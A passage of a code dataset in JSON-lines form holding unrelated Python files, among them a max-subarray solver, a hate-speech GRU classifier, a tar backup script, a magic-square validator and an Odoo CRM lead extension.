i\n if nCurSum > nGreatestSum:\n nGreatestSum = nCurSum\n return nGreatestSum\n \n # Dynamic programming version\n def FindGreatestSumOfSubArray2(self, array):\n if array is None or len(array) <= 0:\n return 0\n aList = [0] * len(array) \n for i, number in enumerate(array):\n if i == 0 or aList[i-1] <= 0:\n aList[i] = number\n else:\n aList[i] = aList[i-1] + number\n return max(aList) \n \n\nalist = [1, -2, 3, 10, -4, 7, 2, -5]\ns = Solution()\nprint(s.FindGreatestSumOfSubArray(alist))\nprint(s.FindGreatestSumOfSubArray2(alist))","sub_path":"剑指Offer/面试题31.连续子数组的最大和.py","file_name":"面试题31.连续子数组的最大和.py","file_ext":"py","file_size_in_byte":1554,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"28067391","text":"true = True\nwhile true == True:\n #Add information\n def Add_Info():\n Human = input(\"Who would you like to add info about: \")\n Comand = input(\"What would you like to do: \")\n if Comand == \"Add\":\n Info = input(\"Add in information: \")\n Add = open(Human + \".txt\", \"a\")\n Add.write(Info + \"\\n\")\n Add.close()\n loop = input()\n while loop == \"new\":\n Info = input(\"Add in information: \")\n loop = input()\n Add = open(Human + \".txt\", \"a\")\n Add.write(Info + \"\\n\")\n Add.close()\n if Comand == \"Read\":\n Add = open(Human + \".txt\", \"r\")\n Read_Info = Add.read()\n print(Read_Info)\n Add.close()\n\n\n \n\n #Add the person \n def Add_Person():\n NameOfPerson = input(\"What is the name of the person: \")\n if NameOfPerson == \"skip\":\n Add_Info()\n else:\n Location = input(\"Where is the person from: \")\n Add = open(NameOfPerson + \".txt\", \"w\")\n Add.write(NameOfPerson + \"\\n\")\n Add.write(Location + \"\\n\")\n Add.close()\n Add_Info()\n\n\n\n #Add Person\n Add_Person()\n","sub_path":"AddPerson.py","file_name":"AddPerson.py","file_ext":"py","file_size_in_byte":1258,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"429855991","text":"import itertools\n\n__author__ = 'cherry'\nimport threading\nfrom download import LeechTorrent\nfrom get_magnet import GetMagnetLink\n\n\ndef downloadTest():\n\tleech_torrent = LeechTorrent()\n\tget_magnet_link = GetMagnetLink()\n\tleech_torrent.save_path = '/home/cherry/Downloads/torrent/'\n\tmagnet_link = get_magnet_link.getKickass()\n\tfor i in magnet_link:\n\t\tleech_torrent.urlDown(i)\n\n#for i in itertools.izip_longest(*[iter(magnet_link)] * 3):\nif __name__ == '__main__':\n\tdownloadTest()","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":475,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"423551050","text":"from keras.callbacks import EarlyStopping\nfrom keras_preprocessing import sequence\nimport re\n\nimport string\nimport nltk\nimport numpy as np\nimport pandas as pd\nfrom nltk.corpus import stopwords\nfrom nltk.stem import SnowballStemmer, PorterStemmer\nfrom nltk.tokenize import TweetTokenizer\nimport os\n\n\n# Keras\nfrom keras.preprocessing.text import Tokenizer\nfrom keras.preprocessing.sequence import pad_sequences\nfrom keras.models import Sequential, Model\nfrom keras.layers import Dense, Flatten, LSTM, Conv1D, MaxPooling1D, Dropout, Activation, Embedding, GRU, Input, \\\n Bidirectional, SpatialDropout1D\nfrom keras.layers.embeddings import Embedding\nfrom keras.regularizers import l2\nfrom keras.utils import np_utils, to_categorical\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nfrom 
sklearn.feature_selection import SelectKBest\nfrom sklearn.metrics import precision_score, recall_score, roc_auc_score, f1_score, classification_report\nfrom sklearn.model_selection import train_test_split\n \n \ndef removeStopwords(tweets):\n stopwords = nltk.corpus.stopwords.words(\"english\")\n # stops.update(['.',',','\"',\"'\",'?',':',';','(',')','[',']','{','}'])\n tokens = [tok for tok in tweets if not tok in stopwords]\n return tokens\n \n \n \ndef removeURL(tweets):\n # newText = re.sub('http\\\\S+', '', tweets, flags=re.MULTILINE)\n space_pattern = '\\s+'\n giant_url_regex = ('http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|'\n '[!*\\(\\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+')\n # mention_regex = '@[\\w\\-]+'\n parsed_text = re.sub(space_pattern, ' ', tweets)\n parsed_text = re.sub(giant_url_regex, 'URLHERE', parsed_text)\n # parsed_text = re.sub(mention_regex, 'MENTIONHERE', parsed_text)\n return parsed_text\n\ndef removeNumber(tweets):\n newText = re.sub('\\\\d+', '', tweets)\n return newText\n\ndef removeHashtags(tokens):\n toks = [ tok for tok in tokens if tok[0] != '#']\n# if segment == True:\n# segTool = Analyzer('en')\n# for i, tag in enumerate(self.hashtags):\n# text = tag.lstrip('#')\n# segmented = segTool.segment(text)\n\n return toks\n\ndef removePunctuation (tweets):\n translator = str.maketrans('', '', string.punctuation)\n return tweets.translate(translator)\n\n\ndef stemTweet(tokens):\n stemmer = SnowballStemmer('english')\n stemmed_words = [stemmer.stem(word) for word in tokens]\n return stemmed_words\n\n# In[32]:\n\n\ndef preprocess(tweet, remove_punctuation = True, remove_stopwords = False, remove_url = True, remove_hashtags = False, remove_number = True, stem_tweet = False):\n# text = tweet.translate(string.punctuation) -> to figure out what it does ?\n \"\"\"\n Tokenize the tweet text using TweetTokenizer.\n set strip_handles = True to Twitter username handles.\n set reduce_len = True to replace repeated character sequences of length 3 or greater with sequences of length 3.\n \"\"\"\n if remove_punctuation:\n tweet = removePunctuation(tweet)\n if remove_url:\n tweet = removeURL(tweet)\n twtk = TweetTokenizer(strip_handles=True, reduce_len=True)\n if remove_number:\n tweet = removeNumber(tweet)\n tokens = [w.lower() for w in twtk.tokenize(tweet) if w != \"\" and w is not None]\n if remove_hashtags:\n tokens = removeHashtags(tokens)\n if remove_stopwords:\n tokens = removeStopwords(tokens)\n if stem_tweet:\n tokens = stemTweet(tokens)\n text = \" \".join(tokens)\n return text\n\ndf = pd.read_csv('hateval2019-dataset/hateval2019_en_train.csv', quotechar=\"\\\"\", encoding='utf-8')\n# df = pd.read_csv('gdrive/My Drive/GMU/hatEval-2019/public_development_en/hateval2019_en_train.csv', quotechar=\"\\\"\", encoding='utf-8')\n# df = df.dropna()\n# df = df.loc[df['HS'] == 1]\ndf['text'] = df['text'].map(lambda x: preprocess(x, remove_stopwords=True, remove_hashtags=False, remove_number= True, remove_url=True, stem_tweet=False))\ny_train = to_categorical(df['HS'])\n\ndf1 = pd.read_csv('hateval2019-dataset/hateval2019_en_test.csv', quotechar=\"\\\"\", encoding='utf-8')\n# df1 = df1.dropna()\n# df1 = df1.loc[df1['HS'] == 1]\ndf1['text'] = df1['text'].map(lambda x: preprocess(x, remove_stopwords=True, remove_hashtags=False, remove_number= True, remove_url=True, stem_tweet=False))\ny_test = to_categorical(df1['HS'])\n\n\n\n# The maximum number of words to be used. 
(most frequent)\nMAX_NUMBER_WORDS = 50000\n# Max number of words in each tweet.\nMAX_SEQUENCE_LENGTH = 140\n# This is fixed.\nEMBEDDING_DIM = 100\n\n\ntokenizer = Tokenizer(num_words=MAX_NUMBER_WORDS, filters='!\"$%&()*+,-./:;<=>?@[\\]^_`{|}~', lower=True)\ntokenizer.fit_on_texts(df['text'].values)\nword_index = tokenizer.word_index\nprint('Found %s unique tokens.' % len(word_index))\n\n# reuse the tokenizer fitted on the training texts so train and test share\n# one vocabulary (the original re-fit the tokenizer on the test set here,\n# which built the word index from test data only)\n\nX_train = tokenizer.texts_to_sequences(df['text'].values)\nX_train = pad_sequences(X_train, maxlen=MAX_SEQUENCE_LENGTH)\nprint('Shape of train data tensor:', X_train.shape, y_train.shape)\n\nX_test = tokenizer.texts_to_sequences(df1['text'].values)\nX_test = pad_sequences(X_test, maxlen=MAX_SEQUENCE_LENGTH)\nprint('Shape of test data tensor:', X_test.shape, y_test.shape)\n\n\n\n################### model building ###################\nmodel = Sequential()\nmodel.add(Embedding(MAX_NUMBER_WORDS, EMBEDDING_DIM, input_length=X_train.shape[1]))\nmodel.add(SpatialDropout1D(0.2))\nmodel.add(Bidirectional(GRU(100, dropout=0.2, recurrent_dropout=0.2)))\nmodel.add(Dense(64, activation='relu'))\nmodel.add(Dropout(0.2))\nmodel.add(Dense(32, activation='relu'))\nmodel.add(Dropout(0.2))\nmodel.add(Dense(2, activation='softmax'))\nmodel.compile(loss='categorical_crossentropy', optimizer='adam', metrics=['accuracy'])\n\nprint(model.summary())\nepochs = 15\nbatch_size = 64\n\nhistory = model.fit(X_train, y_train, epochs=epochs, batch_size=batch_size, validation_split=0.1, callbacks=[EarlyStopping(monitor='val_loss', patience=3, min_delta=0.0001)])\n\ny_predict = model.predict(X_test, batch_size=None, steps=None)\n\ny_predict = np.argmax(y_predict, axis=1)\ny_test = np.argmax(y_test, axis=1)\n\n\n\nprint(\"Precision\\t\", precision_score(y_test, y_predict, average=None))\nprint(\"Recall \\t\", recall_score(y_test, y_predict, average=None))\nprint(\"F1-Score \\t\", f1_score(y_test, y_predict, average=None))\nprint(\"ROC-AUC \\t\", roc_auc_score(y_test, y_predict, average=None))\n\ntarget_names = ['0', '1']\nprint(classification_report(y_test, y_pred=y_predict, target_names=target_names))\nf = open(\"GRUModel/hatEvalGRUEN_HS.txt\", \"w\")\nf.write(classification_report(y_test, y_pred=y_predict, target_names=target_names))\nf.close()\nimport matplotlib.pyplot as plt\nplt.plot(history.history['acc'])\nplt.plot(history.history['val_acc'])\nplt.title('model accuracy')\nplt.ylabel('accuracy')\nplt.xlabel('epoch')\nplt.legend(['train', 'test'], loc='upper left')\nplt.savefig('GRUModel/epochVsAccEN_HS.pdf')\nplt.show()\n# summarize history for loss\nplt.plot(history.history['loss'])\nplt.plot(history.history['val_loss'])\nplt.title('model loss')\nplt.ylabel('loss')\nplt.xlabel('epoch')\nplt.legend(['train', 'test'], loc='upper left')\nplt.savefig('GRUModel/epochVslossEN_HS.pdf')\nplt.show()\n\n#############heat map############\n\nimport seaborn\nfrom sklearn.metrics import confusion_matrix\n\nseaborn.countplot(df['HS'])\nplt.xlabel('Label')\nplt.title('Classification')\nplt.show()\n\nconfusion_matrix = confusion_matrix(y_test, y_predict)\nacc = np.sum(confusion_matrix.diagonal()) / np.sum(confusion_matrix)\nprint('Overall accuracy: {} %'.format(acc*100))\nmatrix_proportions = np.zeros((2, 2))\nfor i in range(0, 2):\n matrix_proportions[i, :] = confusion_matrix[i, 
:] / float(confusion_matrix[i, :].sum())\nnames = ['Non AG', 'AG']\nconfusion_df = pd.DataFrame(matrix_proportions, index=names, columns=names)\nplt.figure(figsize=(10, 10))\nseaborn.heatmap(confusion_df, annot=True, annot_kws={\"size\": 20}, cbar=False, square=True, fmt='.2f', cmap=\"RdBu_r\")\nplt.ylabel(r'True categories', fontsize=25)\nplt.xlabel(r'Predicted categories', fontsize=25)\nplt.tick_params(axis='both', which='major', labelsize=10)\nplt.tick_params(axis='both', which='minor', labelsize=10)\n# #Uncomment line below if you want to save the output\nplt.savefig('GRUModel/ConfusionMatrixGRUEN_HS.pdf')\n\n\n\n\n\n","sub_path":"models/hateEvalGRU.py","file_name":"hateEvalGRU.py","file_ext":"py","file_size_in_byte":8426,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"324444333","text":"import kerasPredict.model.lstmTimeSeries as lstm\nimport time\nimport matplotlib\nmatplotlib.use('TkAgg')\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\nfrom keras.models import load_model\nimport keras.backend.tensorflow_backend as KTF\nimport tensorflow as tf\nfrom keras import optimizers,losses\nimport kerasPredict.Evaluate as ev\n\nKTF.set_session(tf.Session(config=tf.ConfigProto(device_count={'cpu':0})))\n\n\ndef mdsave(model,model_path,index_num,sum_epoch,pos_range):\n model_name = str(index_num) + '_' + str(sum_epoch) + '_pos_' + str(pos_range) + '_lstm_model' # 37_pos_40_lstm_model\n model.save(model_path + model_name + '.h5')\n model.save_weights(model_path + model_name + '_weights.h5')\n\n\ndef fig_show(predict_ten, pos_target, pos_cls = None):\n plt.plot(predict_ten,label='pred')\n plt.plot(pos_target,label='true')\n # plt.plot(pos_cls * 3, label='close')\n #plt.plot(ave_pred,label='ave pred')\n plt.legend(loc='upper right')\n plt.rcParams['figure.figsize'] = (12.0, 7.0)\n plt.show()\n return plt\n\ndef fig_save(plt,model_path,index_num,sum_epoch,pos_range):\n plt.rcParams['savefig.dpi'] = 500\n model_name = str(index_num) + '_' + str(sum_epoch) + '_pos_' + str(pos_range) + '_lstm_model'\n plt.savefig(model_path + model_name + '.png', format='png',dpi=500)\n\ndef loadModel(model_path,index_n=1, epochs=2, pos_range=0.25):\n model_name = str(index_n) + '_' + str(epochs) + '_pos_' + str(pos_range) + '_lstm_model' # 37_pos_40_lstm_model\n model = load_model(model_path + model_name + '.h5')\n model.load_weights(model_path + model_name + '_weights.h5')\n return model,model_name\n\n\n\nimport dataProcess.FeaturesGen as FG\n\nif __name__=='__main__':\n global_start_time = time.time()\n epochs = 17\n seq_len = 100\n\n model_path = '../model_linear/top_model/'\n POS = 'pos'\n CLS = 'cls'\n train_mode = POS\n\n\n print('> Loading data... ')\n #nor_result = result\n path = '../dataProcess/data_file/'\n\n pos_range = 0.2\n is_save = 0\n if is_save == 1:\n (X_train, y_train, X_test, y_test) = FG.get_train_save(path, pos_range) #从互联网下载数据并预处理\n else:\n file_name = '../dataProcess/data_file/pos_0.2_train_pos_z.npz'\n (X_train, y_train, X_test, y_test) = FG.get_train_load(file_name = file_name)\n print('> Data Loaded. 
Compiling...')\n\n i = 0\n for y in y_train:\n if y < 0.5:\n y_train[i] = 0.5\n # elif y <= 0.8:\n # y_train[i] = 0.8\n # elif y <= 0.9:\n # y_train[i] = 0.9\n i += 1\n\n xcnn_train = np.reshape(X_train, [X_train.shape[0], 1, 100, 5])\n xcnn_test = np.reshape(X_test, [X_test.shape[0], 1, 100, 5])\n\n start = time.time()\n input_nodes = X_train.shape[2]\n if y_train.ndim == 1:\n output_nodes = 1\n else:\n output_nodes = y_train.shape[1]\n\n\n index_num = 1\n sum_epoch = 0 #234\n\n # load a previously trained model from disk\n # model_linear,model_name = loadModel(model_path,index_n=1, epochs = sum_epoch, pos_range=0.2)\n model_linear = lstm.share_model_linear() # create a new model\n model_linear.summary()\n\n\n #loss_model = losses.distance_categorical_crossentropy\n #loss_model = losses.mae_categorical_crossentropy\n #loss_model = losses.categorical_crossentropy\n #loss_linear = losses.weight_mean_absolute_error\n loss_linear = losses.mae\n #rmsprop = optimizers.RMSprop(lr=0.0001, rho=0.9, epsilon=1e-06)\n opti = optimizers.Adam(lr=0.0005)\n #model.compile(loss=loss_model, optimizer=rmsprop, metrics=['accuracy'])\n model_linear.compile(loss=loss_linear, optimizer=opti, metrics=['accuracy'])\n for _ in range(2):\n #pre_loss = new_loss.copy()\n for _ in range(2):\n epochs = 1\n hist = model_linear.fit(\n [X_train,xcnn_train],\n y_train,\n batch_size =70,\n nb_epoch = epochs,\n validation_split = 0.4,\n #class_weight={0:2, 1:1.8, 2:1.8, 3:0.6, 4:0.1, 5:0.1, 6:0.1, 7:0.6, 8:1.8, 9:1.8, 10:2}\n #class_weight = {0: 1.8, 1: 1.8, 2: 1.8, 3: 0.1, 4: 0.1, 5: 0.1, 6: 0.1, 7: 0.1, 8: 0.1, 9: 0.1, 10: 0.1}\n #class_weight={0: 0.1, 1: 0.1, 2: 0.1, 3: 0.1, 4: 0.1, 5: 0.1, 6: 0.1, 7: 0.1, 8: 1.8, 9: 1.8, 10: 1.8}\n )\n sum_epoch += epochs\n new_loss = hist.history['loss']\n mdsave(model_linear, model_path, index_num, sum_epoch, pos_range)\n\n predict_ten = model_linear.predict([X_test, xcnn_test])\n predict_ten *= 100\n pos_target = y_test * 100\n predict_ten = np.clip(predict_ten, 0, 100)\n pos_target = np.reshape(np.clip(pos_target, 0, 100), [len(pos_target), 1])\n\n plt.plot(predict_ten,label='pred')\n plt.plot(pos_target,label='true')\n\n plt.legend(loc='upper right')\n plt.rcParams['figure.figsize'] = (12.0, 7.0)\n # plt.show()\n\n plt.rcParams['savefig.dpi'] = 300\n model_name = str(index_num) + '_' + str(sum_epoch) + '_pos_' + str(pos_range) + '_lstm_model'\n figer_path = '../figer_result/top_pre_fig/top_'\n plt.savefig(figer_path + model_name + '.png', format='png', dpi=300)\n plt.close()\n\n # ## evaluation: compute the precision of crossings below 18\n # turn_error_value = ev.Turn_error(predict_ten, pos_target,8)\n # ev_save_text = 'cross-below-8 turn_error: ' + str(turn_error_value)\n\t\t #\n # up_turn_error_value = ev.up_Turn_error(predict_ten, pos_target,10)\n # ev_save_text = ev_save_text + '\\n cross-above-10 turn_error: ' + str(up_turn_error_value)\n\t\t #\n # ev.save_result(ev_save_text, model_path = figer_path, index = index_num, epoch = sum_epoch)\n\n\n\n\n","sub_path":"kerasPredict/top_predict.py","file_name":"top_predict.py","file_ext":"py","file_size_in_byte":5607,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"178250573","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models\nfrom django.conf import settings\nfrom likes.models import Like\nfrom django.contrib.contenttypes.fields import GenericRelation\nimport os\n\n\n\nclass Question(models.Model):\n name = models.CharField(max_length=255, verbose_name=u'Название вопроса')\n author = models.ForeignKey(settings.AUTH_USER_MODEL, 
related_name='questions', verbose_name=u'Автор')\n created = models.DateTimeField(auto_now_add=True, verbose_name=u'Время создания')\n updated = models.DateTimeField(auto_now=True, verbose_name=u'Время редактирования')\n categories = models.ManyToManyField('categories.Category', related_name='questions', verbose_name=u'Категории')\n text = models.TextField(verbose_name=u'Вопрос')\n likes = GenericRelation(Like, null=True, blank=True)\n is_archive = models.BooleanField(default=False, verbose_name=u'В архиве')\n\n class Meta:\n verbose_name = u'Вопрос'\n verbose_name_plural = u'Вопросы'\n ordering = 'name', 'created'\n\n\n def __unicode__(self):\n return self.name\n","sub_path":"project/src/questions/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1194,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"403488779","text":"#! /usr/bin/python3\n# -*- coding: utf-8 -*-\n# Filename = custom_backup.py\n\nimport os\nimport time\n\nsource_dir = '/home/oracle/LearnPython/'\ntarget_dir = '/home/oracle/Documents/backup'\n\n# join with os.sep so the archive lands inside the backup directory\n# (plain concatenation would name the file backupYYYYMMDDHHMMSS.tar beside it)\ntarget = target_dir + os.sep + time.strftime('%Y%m%d%H%M%S') + '.tar'\ntar_command = 'tar -cv -f {} {}'.format(target, source_dir)\n\n#print(tar_command) # print the command to check for errors\n\nif os.system(tar_command) == 0:\n print('Successful backup')\nelse:\n print('backup failed')","sub_path":"Python/exercise/custom_backup/custom_backup.py","file_name":"custom_backup.py","file_ext":"py","file_size_in_byte":458,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"442625883","text":"import click\n\n\n@click.command()\n@click.argument('activity', default='-', required=True)\ndef cli(activity):\n \"\"\"\n Track how much time you spend on different activities throughout the day!\n ACTIVITY is the type of activity you want to start tracking. 
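Defaults to '-' when no ACTIVITY is given.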
Examples: working, reading, studying.\n \"\"\"\n click.echo('Started tracking time for %s' % activity)\n","sub_path":"commandline_client/timetrack.py","file_name":"timetrack.py","file_ext":"py","file_size_in_byte":362,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"254643764","text":"# -*- coding: utf-8 -*-\nfrom openerp.tools.translate import _\nfrom datetime import datetime, timedelta, date\nfrom openerp.osv import fields, osv\nfrom openerp import tools\nimport time\nimport pytz\n\n\nclass crm_lead(osv.osv):\n _inherit=\"crm.lead\"\n\n _columns = {\n 'contact_last_name':fields.char('Last Name',size=128),\n }\n\n def on_change_partner_id(self, cr, uid, ids, partner_id, context={}):\n lead_addrs = []\n values = {'lead_add_line': False, 'partner_name' : False,\\\n 'contact_name' : False, 'contact_last_name':False,\\\n 'street' : False, 'street2' : False, 'city' : False, \\\n 'state_id' : False, 'country_id' : False, 'email_from' : False, \\\n 'phone' : False, 'mobile' : False, 'fax' : False,\n 'partner_address_id': False}\n if partner_id:\n values = super(crm_lead, self).on_change_partner_id(cr, uid, ids, \\\n partner_id=partner_id, context=context)['value']\n partner = self.pool.get('res.partner').browse(cr, uid, \\\n partner_id, context=context)\n if partner.child_ids:\n for child in partner.child_ids:\n child_data = {\n 'partner_address_id': child.id or False,\n 'phone': child.phone or False,\n 'fax': child.fax or False,\n 'email': child.email or False,\n 'mobile': child.mobile or False,\n 'lead_id': ids and ids[0] or False,\n }\n lead_addrs.append([0,0,child_data])\n values.update({'lead_add_line': lead_addrs,\\\n 'partner_address_id': \\\n partner.child_ids and partner.child_ids[0].id or False})\n if partner.parent_id:\n values.update({'partner_name' : partner.parent_id.name,\n 'contact_name' : partner.first_name,\n 'contact_last_name' : partner.last_name,\n 'function' : partner.function,\n });\n else:\n values.update({'partner_name' : False,\n 'contact_name' : partner.first_name,\n 'contact_last_name' : partner.last_name,\n 'function' : False,\n });\n return {'value' : values}\n\n def _lead_create_contact(self, cr, uid, lead, name, is_company, \\\n parent_id=False, context=None):\n partner = self.pool.get('res.partner')\n if type(name) == dict:\n vals = {\n 'first_name': name['first_name'] or '',\n 'last_name': name['last_name'] or '',\n 'user_id': lead.user_id.id,\n 'comment': lead.description,\n 'section_id': lead.section_id.id or False,\n 'parent_id': parent_id,\n 'phone': lead.phone,\n 'mobile': lead.mobile,\n 'email': tools.email_split(lead.email_from) and \\\n tools.email_split(lead.email_from)[0] or False,\n 'fax': lead.fax,\n 'title': lead.title and lead.title.id or False,\n 'function': lead.function,\n 'street': lead.street,\n 'street2': lead.street2,\n 'zip': lead.zip,\n 'city': lead.city,\n 'country_id': lead.country_id and lead.country_id.id or False,\n 'state_id': lead.state_id and lead.state_id.id or False,\n 'is_company': is_company,\n 'type': 'contact'\n }\n else:\n vals = {'name': name,\n 'first_name': name,\n 'user_id': lead.user_id.id,\n 'comment': lead.description,\n 'section_id': lead.section_id.id or False,\n 'parent_id': parent_id,\n 'phone': lead.phone,\n 'mobile': lead.mobile,\n 'email': tools.email_split(lead.email_from) and \\\n tools.email_split(lead.email_from)[0] or False,\n 'fax': lead.fax,\n 'title': lead.title and lead.title.id or False,\n 'function': lead.function,\n 'street': lead.street,\n 
'street2': lead.street2,\n 'zip': lead.zip,\n 'city': lead.city,\n 'country_id': lead.country_id and lead.country_id.id or False,\n 'state_id': lead.state_id and lead.state_id.id or False,\n 'is_company': is_company,\n 'type': 'contact'\n }\n partner = partner.create(cr, uid, vals, context=context)\n return partner\n\n def _create_lead_partner(self, cr, uid, lead, context=None):\n partner_id = False\n if lead.partner_name and lead.contact_name:\n partner_id = self._lead_create_contact(cr, uid, lead, \\\n lead.partner_name, True, context=context)\n full_name = {'first_name': lead.contact_name, \\\n 'last_name': lead.contact_last_name or ''}\n partner_id = self._lead_create_contact(cr, uid, lead,\\\n full_name, False, partner_id, context=context)\n elif lead.partner_name and not lead.contact_name:\n partner_id = self._lead_create_contact(cr, uid, lead, \\\n lead.partner_name, True, context=context)\n elif not lead.partner_name and lead.contact_name:\n full_name = {'first_name': lead.contact_name,\\\n 'last_name': lead.contact_last_name or ''}\n partner_id = self._lead_create_contact(cr, uid, lead,\\\n full_name, False, context=context)\n elif lead.email_from and self.pool.get('res.partner').\\\n _parse_partner_name(lead.email_from, context=context)[0]:\n contact_name = self.pool.get('res.partner').\\\n _parse_partner_name(lead.email_from, context=context)[0]\n full_name = {'first_name': lead.contact_name, 'last_name': ''}\n partner_id = self._lead_create_contact(cr, uid, lead, \\\n full_name, False, context=context)\n else:\n raise osv.except_osv(\n _('Warning!'),\n _('No customer name defined. \\\n Please fill one of the following fields: Company Name,\\\n Contact Name or Email (\"Name \")')\n )\n return partner_id\n\ncrm_lead()\n\n# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:","sub_path":"vnc_ose/crm.py","file_name":"crm.py","file_ext":"py","file_size_in_byte":7001,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"111512184","text":"\ndef parseCell(cell, intMaximum):\n # The checks for a \"valid cell\" are done here as follows:\n # - Is it actually an int?\n # - Is it within range of 1 to col*rows?\n try:\n intCell = int(cell)\n if (intCell > 0) & (intCell < intMaximum):\n return intCell\n return False\n except:\n return False\n\ndef isValidMagicSquare(listSquare):\n intDiagTotal = 0\n intContraDiagTotal = 0\n intTotalRows = len(listSquare)\n # The first rows length will be our number of columns\n # All rows should equal this, as all cells for every column should be filled\n intTotalColumns = len(listSquare[0])\n\n # Ensure we actually have a square\n # This avoids fatal \"list index out of range\" errors later with invalid files\n if intTotalRows != intTotalColumns:\n print(\"Unequal number of rows/columns\")\n return False\n\n # This is really just n ^ 2, but without importing any square method\n intMaximum = (intTotalColumns * intTotalRows) + 1\n\n # This is a very clever loop that may look deceivingly complex. 
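It checks rows, columns and both diagonals in a single O(n^2) pass.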
It works as follows:\n # - Loop over each column index:\n # - Loop over each row index:\n # - Validate the next cell on the row and increment the total\n # - Validate the next cell on the column and increment the total\n # - Check if the current row's length is same as the first - quit early if so!\n # - If the row/column totals don't match, we quit early here too\n # - Otherwise, we can also grab the next cell on the diagonals,\n # and increment those totals too\n # Unfortunately we have to wait later to validate these as we must go over EVERY row/col\n # - Now validate ALL totals match. If there is a problem here, it must be related to the\n # diagonal totals as we checked the rows and columns earlier\n for y in range(len(listSquare)):\n intRowTotal = 0\n intColumnTotal = 0\n if len(listSquare[y]) != intTotalColumns:\n print(\"Row \"+str(y+1)+\" has an incorrect length\")\n return False\n for x in range(len(listSquare)):\n cellNextRow = listSquare[x][y]\n intNextRow = parseCell(cellNextRow, intMaximum)\n if intNextRow == False:\n print(\"Invalid cell '\"+cellNextRow+\"'\")\n return False\n cellNextCol = listSquare[y][x]\n intNextCol = parseCell(cellNextCol, intMaximum)\n if intNextCol == False:\n print(\"Invalid cell '\"+cellNextCol+\"'\")\n return False\n intRowTotal += intNextRow\n intColumnTotal += intNextCol\n if intRowTotal != intColumnTotal:\n print(\"There is a problem with your column / row totals\")\n return False\n # We dont need to re-run parseCell here as all cells should be caught above\n intDiagTotal += int(listSquare[y][y])\n intContraDiagTotal += int(listSquare[len(listSquare)-y-1][y])\n if intRowTotal == intColumnTotal == intDiagTotal == intContraDiagTotal:\n return True\n print(\"There is a problem with your diagonal totals\")\n return False\n\ndef hasDuplicates(readContents):\n # A simple way to duplicate check the values in the square\n # is to compare the length of the contents against a Set (which removes duplicates)\n listContents = readContents.split()\n return len(listContents) != len(set(listContents))\n\ndef writeFile(readContents, strFilename):\n fileOpen = open(\"VALID_\"+strFilename, \"w\")\n fileOpen.write(readContents)\n fileOpen.close()\n\ndef parseFile(readContents):\n # We want to validate the square in as FEW iterations as possible\n # So we will parse the file contents into a matrix, where each nested list\n # contains the row's values\n # This will help us loop efficiently later\n listStringRows = readContents.splitlines()\n\n listListRows = []\n\n # We could do a map here as this is only one line per itt, but then we'd have to convert back to list\n # Would probably end up being more confusing to the next reader\n for row in listStringRows:\n listListRows.append(row.split())\n return listListRows\n\ndef readData():\n # While a valid file is NOT found, prompt the user to input a filename\n while True:\n try:\n strFileName = input(\"> \")\n io = open(strFileName, 'r')\n return [io, strFileName]\n except FileNotFoundError:\n print(\"'\"+strFileName+\"' not found\")\n\nif __name__ == \"__main__\":\n print(\"This program reads a text file and validates if the contents are a magic square\\nEnter the filename below\")\n # Pull out the file contents plus the filename we will be using later if valid\n # Firstly check for duplicates, if found we can quit before any iteration is needed\n # Then validate the file contents by iterating through the square\n # If successful we can write the VALID_ file\n # Otherwise, print and quit\n listReturn = readData()\n io = 
listReturn[0]\n strFilename = listReturn[1]\n readContents = io.read()\n io.close()\n\n bDuplicates = hasDuplicates(readContents)\n if bDuplicates:\n print(\"Square has duplicates\")\n exit()\n\n listSquare = parseFile(readContents)\n bValid = isValidMagicSquare(listSquare)\n if bValid:\n print(\"Writing valid square\")\n writeFile(readContents, strFilename)\n else:\n print(\"Square is not valid\")\n exit()\n","sub_path":"MagicSquare.py","file_name":"MagicSquare.py","file_ext":"py","file_size_in_byte":5446,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"368962428","text":"# import pdb\nfrom PIL import Image\nfrom numpy import *\nfrom pylab import *\nimport imtools\nimport pca\n\nimlist = imtools.get_imlist('a_thumbs/')\n\nim = array(Image.open(imlist[0]))\nm, n = im.shape[0:2]\nimnbr = len(imlist)\n\n# pdb.set_trace()\nimmatrix = array([array(Image.open(im)).flatten() for im in imlist], 'f')\n\nV, S, immean = pca.pca(immatrix)\n\nfigure()\ngray()\nsubplot(2, 4, 1)\nimshow(immean.reshape(m, n))\nfor i in range(7):\n subplot(2, 4, i+2)\n imshow(V[i].reshape(m, n))\n\nshow()","sub_path":"ch01/font_pca.py","file_name":"font_pca.py","file_ext":"py","file_size_in_byte":489,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"102591642","text":"#\n# Copyright (c) 2018 Jonathan Weyn \n#\n# See the file LICENSE for your rights.\n#\n\n\"\"\"\nMethods for processing OBS data.\n\"\"\"\n\nimport os\nimport numpy as np\nimport pandas as pd\nfrom datetime import datetime, timedelta\nimport pickle\nfrom collections import OrderedDict\nfrom mosx.MesoPy import Meso\nfrom siphon.simplewebservice.wyoming import WyomingUpperAir\nfrom metpy.calc import interp\nfrom mosx.util import generate_dates, get_array, read_pkl\n\n\ndef upper_air(config, station_id, sounding_station_id, date, 